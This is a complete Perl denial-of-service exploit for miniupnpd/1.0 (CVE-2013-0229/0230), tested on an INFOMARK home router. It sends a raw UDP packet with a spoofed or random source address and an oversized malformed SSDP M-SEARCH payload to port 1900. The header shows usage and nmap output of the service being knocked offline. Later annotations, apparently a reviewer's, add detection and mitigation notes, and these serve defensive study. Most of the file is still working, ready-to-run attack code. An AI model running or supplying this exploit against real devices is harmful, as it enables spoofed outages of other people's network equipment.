#!/usr/bin/perl
#
# miniupnpd/1.0 remote denial of service exploit
#
# Copyright 2015 (c) Todor Donev
# todor.donev@gmail.com
# http://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# The SSDP protocol discovers Plug & Play devices for
# UPnP (Universal Plug and Play). SSDP is an HTTP-like
# protocol and works with the NOTIFY and M-SEARCH
# methods.
#
# See also:
# CVE-2013-0229
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0229
# CVE-2013-0230
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0230
#
# Tested on
# Device Name : IMW-C920W
# Device Manufacturer : INFOMARK (http://infomark.co.kr)
#
# These devices are commonly used by Max Telecom, Bulgaria
#
# Disclaimer:
# This or previous program is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use at your own risk!
# # See also: # SSDP Reflection DDoS Attacks # http://tinyurl.com/mqwj6xt # ####################################### # # # perl miniupnpd.pl # # [ miniupnpd/1.0 remote denial of service exploit ] # [ =============================================== ] # [ Usage: # [ ./miniupnpd.pl <victim address> <spoofed address> # [ Example: # [ perl miniupnpd.pl 192.168.1.1 133.73.13.37 # [ Example: # [ perl miniupnpd.pl 192.168.1.1 # [ =============================================== ] # [ 2015 <todor.donev@gmail.com> Todor Donev 2015 ] # # # nmap -sU 192.168.1.1 -p1900 --script=upnp-info # # Starting Nmap 5.51 ( http://nmap.org ) at 0000-00-00 00:00 EEST # Nmap scan report for 192.168.1.1 # Host is up (0.00078s latency). # PORT STATE SERVICE # 1900/udp open upnp # | upnp-info: # | 192.168.1.1 # | Server: 1.0 UPnP/1.0 miniupnpd/1.0 # | Location: http://192.168.1.1:5000/rootDesc.xml # | Webserver: 1.0 UPnP/1.0 miniupnpd/1.0 # | Name: INFOMARK Router # | Manufacturer: INFOMARK # | Model Descr: INFOMARK Router # | Model Name: INFOMARK Router # | Model Version: 1 # | Name: WANDevice # | Manufacturer: MiniUPnP # | Model Descr: WAN Device # | Model Name: WAN Device # | Model Version: 20070228 # | Name: WANConnectionDevice # | Manufacturer: MiniUPnP # | Model Descr: MiniUPnP daemon # | Model Name: MiniUPnPd # |_ Model Version: 20070228 # MAC Address: 00:00:00:00:00:00 (Infomark Co.) // CENSORED # # Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds # # # perl miniupnpd.pl 192.168.1.1 # # [ miniupnpd/1.0 remote denial of service exploit ] # [ =============================================== ] # [ Target: 192.168.1.1 # [ Send malformed SSDP packet.. # # # nmap -sU 192.168.1.1 -p1900 # # Starting Nmap 5.51 ( http://nmap.org ) at 0000-00-00 00:00 EEST # Nmap scan report for 192.168.1.1 # Host is up (0.00085s latency). # PORT STATE SERVICE # 1900/udp closed upnp // GOOD NIGHT, SWEET PRINCE.... :D # MAC Address: 00:00:00:00:00:00 (Infomark Co.) 
# // CENSORED
#
# Nmap done: 1 IP address (1 host up) scanned in 0.16 seconds
#
#
# Special thanks to HD Moore ..
#
# ---------------------------------------------------------------------------
# Reviewer notes (read as a defender):
#
#   * The script needs root because it opens a SOCK_RAW socket and supplies
#     its own IP header; that is also what lets it write an arbitrary
#     (spoofed) source address into the packet.
#   * What a sensor sees: one UDP datagram to port 1900 from source port
#     31337 whose payload begins with a fixed "M-SEARCH * HTTP/1.1" prefix
#     followed by 1261 random letters in the range 'A'..'Y' (chr 65..89).
#     The IP source is the second command-line argument or, when absent,
#     a random address from randip().
#   * Mitigation: run a miniupnpd release that fixes the CVEs cited in the
#     file header (CVE-2013-0229 / CVE-2013-0230), do not expose SSDP/UPnP
#     (UDP 1900) on untrusted interfaces, and apply ingress filtering
#     (BCP 38) so spoofed source addresses are dropped at the network edge.
#   * Code hygiene: no `use strict; use warnings;`, a bareword filehandle
#     (RAW) shared as a package global, and raw numeric setsockopt() values;
#     see the per-line notes below.
# ---------------------------------------------------------------------------

# Provides PF_INET, SOCK_RAW and friends.
use Socket;

# $< is the real user id; creating a SOCK_RAW socket below requires root.
if ( $< != 0 ) {
    print "Sorry, must be run as root!\n";
    print "This script use RAW Socket.\n";
    exit;
}

# (gethostbyname(...))[4] is the first address for the name as a packed
# 4-byte string -- the form the 'a4' pack fields below expect.
# $ARGV[1] (spoofed source) is optional, so $ip_src may be undef here;
# only $ip_dst is checked before the socket is opened.
my $ip_src = (gethostbyname($ARGV[1]))[4];
my $ip_dst = (gethostbyname($ARGV[0]))[4];

print "\n[ miniupnpd/1.0 remote denial of service exploit ]\n";
print "[ =============================================== ]\n";
# 4-arg select() with undef handles is the classic sub-second sleep.
select(undef, undef, undef, 0.40);

# Usage banner: shown only when the target ($ARGV[0]) did not resolve.
if (!defined $ip_dst) {
    print "[ Usage:\n[ ./$0 <victim address> <spoofed address>\n";
    select(undef, undef, undef, 0.55);
    print "[ Example:\n[ perl $0 192.168.1.1 133.73.13.37\n";
    print "[ Example:\n[ perl $0 192.168.1.1\n";
    print "[ =============================================== ]\n";
    print "[ 2015 <todor.donev\@gmail.com> Todor Donev 2015 ]\n\n";
    exit;
}

# Raw IPv4 socket, protocol 255 (IPPROTO_RAW). RAW is a bareword handle,
# i.e. a package global, and is reused by send_packet() below.
socket(RAW, PF_INET, SOCK_RAW, 255) or die $!;
# Level 0 is IPPROTO_IP; option 1 / value 1 are bare numbers rather than
# named constants, and which IP_* option the number 1 denotes is
# platform-dependent. NOTE(review): presumably intended to request a
# header-included socket -- confirm against the local socket headers.
setsockopt(RAW, 0, 1, 1) or die $!;

main();

# Main program: concatenate IP header, UDP header and payload into one
# buffer and hand it to send_packet().
sub main {
    my $packet;
    $packet = iphdr();
    $packet .= udphdr();
    $packet .= payload();
    # b000000m...
    send_packet($packet);
}

# IP header (Layer 3).
# Returns the 20-byte IPv4 header as a packed string. The pack template is
# 'H2 H2 n n B16 h2 c n a4 a4':
#   H2  version/IHL as the two hex digits "4" . "5"
#   H2  TOS (the value 0 is stringified and used as a hex digit)
#   n   total length
#   n   identification
#   B16 flags + fragment offset as a bit string, zero-padded to 16 bits
#   h2  TTL (hex string, low nybble first)
#   c   protocol (17 = UDP)
#   n   header checksum (left 0 here)
#   a4  source address, packed
#   a4  destination address, packed
# Reads the file-scoped $ip_src and $ip_dst.
sub iphdr {
    my $ip_ver = 4; # IP Version 4 (4 bits)
    my $iphdr_len = 5; # IP Header Length (4 bits)
    my $ip_tos = 0; # Differentiated Services (8 bits)
    # Total length field as this code computes it ($iphdr_len + 20).
    # NOTE(review): whether the kernel rewrites length/checksum on a
    # header-included raw socket is platform-dependent -- confirm.
    my $ip_total_len = $iphdr_len + 20; # IP Header Length + Data (16 bits)
    my $ip_frag_id = 0; # Identification Field (16 bits)
    # Both literals below are octal 0; they stringify to "0" each, so the
    # B16 field receives "00" and is zero-padded to 16 bits.
    my $ip_frag_flag = 000; # IP Frag Flags (R DF MF) (3 bits)
    my $ip_frag_offset = 0000000000000; # IP Fragment Offset (13 bits)
    # Packed with 'h2' (hex string, low nybble first), so the byte on the
    # wire is not decimal 255. NOTE(review): verify in a capture if TTL is
    # used as a detection feature.
    my $ip_ttl = 255; # IP TTL (8 bits)
    my $ip_proto = 17; # IP Protocol (8 bits)
    my $ip_checksum = 0; # IP Checksum (16 bits)
    # Declares a NEW lexical $ip_src that shadows the file-scoped one for
    # the rest of this sub; `my` under a statement modifier is documented
    # as undefined behaviour in perlsyn. `&randip` bypasses randip's ()
    # prototype, and gethostbyname() in scalar context returns the packed
    # address of the dotted-quad string it is given.
    my $ip_src=gethostbyname(&randip) if !$ip_src; # IP Source (32 bits)
    # IP Packet construction
    my $iphdr = pack( 'H2 H2 n n B16 h2 c n a4 a4', $ip_ver . $iphdr_len, $ip_tos, $ip_total_len, $ip_frag_id, $ip_frag_flag . $ip_frag_offset, $ip_ttl, $ip_proto, $ip_checksum, $ip_src, $ip_dst );
    return $iphdr;
}

# UDP header (Layer 4).
# Returns the 8-byte UDP header: source port, destination port, length,
# checksum, each as a big-endian 16-bit field ('n n n n').
sub udphdr {
    my $udp_src_port = 31337; # UDP Source Port (16 bits) (0-65535)
    my $udp_dst_port = 1900; # UDP Dest Port (16 bits) (0-65535)
    # Calls payload() a second time; its random bytes differ from the ones
    # main() appends, but the length is fixed (prefix + 1261 bytes), so the
    # value matches the payload actually sent.
    my $udp_len = 8 + length(payload()); # UDP Length (16 bits) (0-65535)
    # A zero UDP checksum over IPv4 means "no checksum"; it is not computed here.
    my $udp_checksum = 0; # UDP Checksum (16 bits)
    # UDP Packet
    my $udphdr = pack( 'n n n n', $udp_src_port, $udp_dst_port, $udp_len, $udp_checksum );
    return $udphdr;
}

# Create SSDP Bomb.
# Returns the UDP payload: a fixed request-line prefix followed by 1261
# random characters from 'A'..'Y' (int(rand(25)) + 65 -> 65..89).
# No arguments; consumes rand().
sub payload {
    my $data;
    my $head;    # unused
    # Double-quoted: "\/" is "/", and "\\r\\n" are the four literal
    # characters backslash-r-backslash-n.
    $data = "M-SEARCH * HTTP\/1.1\\r\\n";
    for (0..1260) {
        $data .= chr( int(rand(25) + 65) );
    }
    # 'a' with a count equal to the string length copies the bytes unchanged.
    my $payload = pack('a' . length($data), $data);
    return $payload;
}

# Generate random source ip address.
# Returns a dotted-quad string with each octet in 0..254 (int(rand(255))).
# Declared with an empty prototype; the only caller uses `&randip`, which
# bypasses the prototype and passes the caller's @_ through (unused here).
sub randip () {
    # Reseeds the RNG on every call from time and the pid.
    srand(time() ^ ($$ + ($$ << 15)));
    my $ipdata;
    # `=` binds tighter than `,`, so $ipdata receives the join() result and
    # the trailing "\n" is evaluated in void context (never appended).
    $ipdata = join ('.', (int(rand(255)), int(rand(255)), int(rand(255)), int(rand(255)))), "\n";
    # $ipsrc is never used; rand($ipdata) numifies the dotted string.
    my $ipsrc = pack('A' . length($ipdata), rand($ipdata));
    return $ipdata;
}

# Send the malformed packet.
# $_[0] is the complete packet (IP header included). The destination
# sockaddr is built by hand with 'Sna4x8': 'S' native unsigned short
# (address family), 'n' big-endian port 60, 'a4' packed destination
# address, 'x8' zero padding. NOTE(review): on a raw socket the port in
# the sockaddr is presumably ignored -- the UDP ports come from udphdr() --
# confirm for the platform. Dies with $! if send() fails.
sub send_packet {
    print "[ Target: $ARGV[0]\n";
    select(undef, undef, undef, 0.30);
    print "[ Send malformed SSDP packet..\n\n";
    send(RAW, $_[0], 0, pack('Sna4x8', PF_INET, 60, $ip_dst)) or die $!;
}